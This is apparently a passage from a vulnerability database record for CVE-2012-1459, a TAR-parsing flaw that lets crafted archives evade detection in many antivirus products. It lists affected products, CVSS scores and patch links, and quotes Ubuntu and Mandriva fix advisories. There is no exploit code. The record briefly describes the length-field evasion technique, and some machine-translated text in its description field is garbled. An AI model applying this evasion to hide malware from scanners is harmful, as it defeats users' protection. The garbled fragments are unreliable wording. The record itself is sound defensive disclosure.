            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux sparc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux powerpc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux arm",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "virusbuster",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "13.6.1510",
         },
         {
            model: "trend micro",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "symantec",
            version: "20101.3103",
         },
         {
            model: "opensuse",
            scope: "eq",
            trust: 0.3,
            vendor: "s u s e",
            version: "12.1",
         },
         {
            model: "opensuse",
            scope: "eq",
            trust: 0.3,
            vendor: "s u s e",
            version: "11.4",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "rising",
            version: "22.8303",
         },
         {
            model: "cat-quickheal",
            scope: "eq",
            trust: 0.3,
            vendor: "quick heal",
            version: "11.00",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "pctools",
            version: "7.0.35",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "norman",
            version: "6.6.12",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "microsoft",
            version: "1.6402",
         },
         {
            model: "mcafee-gw-edition 2010.1c",
            scope: null,
            trust: 0.3,
            vendor: "mcafee",
            version: null,
         },
         {
            model: "enterprise server x86 64",
            scope: "eq",
            trust: 0.3,
            vendor: "mandrakesoft",
            version: "5",
         },
         {
            model: "enterprise server",
            scope: "eq",
            trust: 0.3,
            vendor: "mandrakesoft",
            version: "5",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "kaspersky",
            version: "7.0125",
         },
         {
            model: "computing pvt ltd k7antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "k7",
            version: "9.77.3565",
         },
         {
            model: "jiangmin",
            scope: "eq",
            trust: 0.3,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus t3.1.1.97.0",
            scope: null,
            trust: 0.3,
            vendor: "ikarus",
            version: null,
         },
         {
            model: "data software gdata",
            scope: "eq",
            trust: 0.3,
            vendor: "g",
            version: "21",
         },
         {
            model: "software f-prot antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "frisk",
            version: "4.6.2117",
         },
         {
            model: "nod32",
            scope: "eq",
            trust: 0.3,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "emsisoft",
            version: "5.11",
         },
         {
            model: "anti-virus clamav",
            scope: "eq",
            trust: 0.3,
            vendor: "clam",
            version: "0.96.4",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "antivir engine",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "7.11.1163",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.3,
            vendor: "avg",
            version: "10.01190",
         },
         {
            model: "avast5 antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "5.0.6770",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.8.1351.0",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "authentium",
            version: "5.2.115",
         },
         {
            model: "antiy-avl",
            scope: "eq",
            trust: 0.3,
            vendor: "antiy",
            version: "2.0.37",
         },
         {
            model: "engine",
            scope: "eq",
            trust: 0.3,
            vendor: "ahnlab",
            version: "v32011.01.18.00",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "52623",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-secure:f-secure_anti-virus:9.0.16160.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:comodo:comodo_antivirus:7424:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ahnlab:v3_internet_security:2011.01.18.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:nprotect:nprotect_antivirus:2011-01-17.01:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Suman Jana and Vitaly Shmatikov",
      sources: [
         {
            db: "BID",
            id: "52623",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2012-1459",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.3,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2012-1459",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  id: "VHN-54740",
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2012-1459",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201203-422",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-54740",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR Parser If it is announced that there is also a problem with the implementation of CVE May be split.Corresponding to the length field of the full entry and part of the header of the next entry by a third party TAR Malware detection may be bypassed through archive entries. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bit2defender 7. ============================================================================\nUbuntu Security Notice USN-1482-2\nJune 20, 2012\n\nclamav regression\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 11.10\n- Ubuntu 11.04\n\nSummary:\n\nClamAV could improperly detect malware if it opened a specially crafted file. \n\nSoftware Description:\n- clamav: Anti-virus utility for Unix\n\nDetails:\n\nUSN-1482-1 fixed vulnerabilities in ClamAV. The updated packages could fail\nto install in certain situations. This update fixes the problem. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n It was discovered that ClamAV incorrectly handled certain malformed TAR\n archives. (CVE-2012-1457,\n CVE-2012-1459)\n \n It was discovered that ClamAV incorrectly handled certain malformed CHM\n files. A remote attacker could create a specially-crafted CHM file\n containing malware that could escape being detected. (CVE-2012-1458)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n  clamav                          0.97.5+dfsg-1ubuntu0.12.04.2\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.12.04.2\n  libclamav6                      0.97.5+dfsg-1ubuntu0.12.04.2\n\nUbuntu 11.10:\n  clamav                          0.97.5+dfsg-1ubuntu0.11.10.2\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.11.10.2\n  libclamav6                      0.97.5+dfsg-1ubuntu0.11.10.2\n\nUbuntu 11.04:\n  clamav                          0.97.5+dfsg-1ubuntu0.11.04.2\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.11.04.2\n  libclamav6                      0.97.5+dfsg-1ubuntu0.11.04.2\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n  http://www.ubuntu.com/usn/usn-1482-2\n  http://www.ubuntu.com/usn/usn-1482-1\n  https://launchpad.net/bugs/1015337\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.2\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.2\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.2\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory                         MDVSA-2012:094\n http://www.mandriva.com/security/\n _______________________________________________________________________\n\n Package : clamav\n Date    : June 18, 2012\n Affected: Enterprise Server 5.0\n _______________________________________________________________________\n\n Problem Description:\n\n This is a bugfix release that upgrades clamav to the latest version\n (0.97.5) that resolves the following security issues:\n \n The TAR file parser in ClamAV 0.96.4 allows remote attackers to bypass\n malware detection via a TAR archive entry with a length field that\n exceeds the total TAR file size. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459\n http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n d82d78601290e2f6073974170c81841a  mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm\n 80f0475472c0217afd3727019bf27e53  mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm\n c13835eadea8d2af15b628fba3159e8b  mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm\n d7c058fae32f1a081b1d4ca31157df0e  mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm\n 5ad153709c7eb510c2be2e82bfa5ac52  mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm\n 96e3d3f3e9bea802c4109c155c9d1465  mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm \n 203cde43731b63729d1f7f6497033184  mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n b30f5aafd9aaff0a7743fb62f33ccbea  mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 1508801239427c0ac72734f52cb4451c  mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 92b4c5ca6db656801b5b6ae217c6e171  mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 94fad12df2cc900309087bbda13c826a  mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 8ec166a457d0512479adaaf5f80d487f  mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 19bc2758175bcde28ebf7783d68a9b98  mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm \n 203cde43731b63729d1f7f6497033184  mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf\nOUr1QL5Wsvt3KboLKCdYUhE=\n=1QL7\n-----END PGP SIGNATURE-----\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "BID",
            id: "52623",
         },
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
      ],
      trust: 2.34,
   },
   exploit_availability: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            reference: "https://www.scap.org.cn/vuln/vhn-54740",
            trust: 0.1,
            type: "unknown",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
      ],
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2012-1459",
            trust: 3.2,
         },
         {
            db: "BID",
            id: "52623",
            trust: 1.4,
         },
         {
            db: "OSVDB",
            id: "80396",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80389",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80391",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80403",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80395",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80390",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80392",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80393",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80409",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80406",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80407",
            trust: 1.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
            trust: 0.8,
         },
         {
            db: "BUGTRAQ",
            id: "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
            trust: 0.6,
         },
         {
            db: "NSFOCUS",
            id: "19231",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
            trust: 0.6,
         },
         {
            db: "PACKETSTORM",
            id: "113878",
            trust: 0.2,
         },
         {
            db: "PACKETSTORM",
            id: "115619",
            trust: 0.2,
         },
         {
            db: "PACKETSTORM",
            id: "113895",
            trust: 0.2,
         },
         {
            db: "VULHUB",
            id: "VHN-54740",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "113841",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "BID",
            id: "52623",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   id: "VAR-201203-0144",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:10:08.445000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "AVL SDK",
            trust: 0.8,
            url: "http://www.antiy.net/",
         },
         {
            title: "Command Antivirus",
            trust: 0.8,
            url: "http://www.authentium.com/command/csavdownload.html",
         },
         {
            title: "avast! Antivirus",
            trust: 0.8,
            url: "https://www.avast.co.jp/index",
         },
         {
            title: "AVG Anti-Virus",
            trust: 0.8,
            url: "http://www.avgjapan.com/home-small-office-security/buy-antivirus",
         },
         {
            title: "AntiVir",
            trust: 0.8,
            url: "http://www.avira.com/",
         },
         {
            title: "Rising Antivirus",
            trust: 0.8,
            url: "http://www.rising-global.com/",
         },
         {
            title: "Bitdefender",
            trust: 0.8,
            url: "http://www.bitdefender.com/",
         },
         {
            title: "ClamAV",
            trust: 0.8,
            url: "http://www.clamav.net/lang/en/",
         },
         {
            title: "Comodo Antivirus",
            trust: 0.8,
            url: "http://www.comodo.com/home/internet-security/antivirus.php",
         },
         {
            title: "Emsisoft Anti-Malware",
            trust: 0.8,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            title: "ESET NOD32アンチウイルス",
            trust: 0.8,
            url: "http://www.eset.com/us/",
         },
         {
            title: "Fortinet Antivirus",
            trust: 0.8,
            url: "http://www.fortinet.com/solutions/antivirus.html",
         },
         {
            title: "F-Prot Antivirus",
            trust: 0.8,
            url: "http://www.f-prot.com/index.html",
         },
         {
            title: "G Data AntiVirus",
            trust: 0.8,
            url: "http://www.gdata.co.jp/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.ikarus.at/en/",
         },
         {
            title: "Jiangmin Antivirus",
            trust: 0.8,
            url: "http://global.jiangmin.com/",
         },
         {
            title: "K7 AntiVirus",
            trust: 0.8,
            url: "http://www.k7computing.com/en/consumer_home.php",
         },
         {
            title: "McAfee Web Gateway",
            trust: 0.8,
            url: "http://www.mcafee.com/us/products/web-gateway.aspx",
         },
         {
            title: "McAfee Scan Engine",
            trust: 0.8,
            url: "http://www.mcafee.com/us/support/support-eol-scan-engine.aspx",
         },
         {
            title: "Norman Antivirus",
            trust: 0.8,
            url: "http://www.norman.com/products/antivirus_antispyware/en",
         },
         {
            title: "nProtect Anti-Virus",
            trust: 0.8,
            url: "http://global.nprotect.com/product/avs.php",
         },
         {
            title: "openSUSE-SU-2012:0833",
            trust: 0.8,
            url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
         },
         {
            title: "Panda Antivirus",
            trust: 0.8,
            url: "http://www.ps-japan.co.jp/",
         },
         {
            title: "PC Tools AntiVirus",
            trust: 0.8,
            url: "http://www.pctools.com/jp/spyware-doctor-antivirus/",
         },
         {
            title: "Quick Heal",
            trust: 0.8,
            url: "http://www.quickheal.com/",
         },
         {
            title: "Sophos Anti-Virus",
            trust: 0.8,
            url: "http://www.sophos.com/ja-jp/",
         },
         {
            title: "Endpoint Protection",
            trust: 0.8,
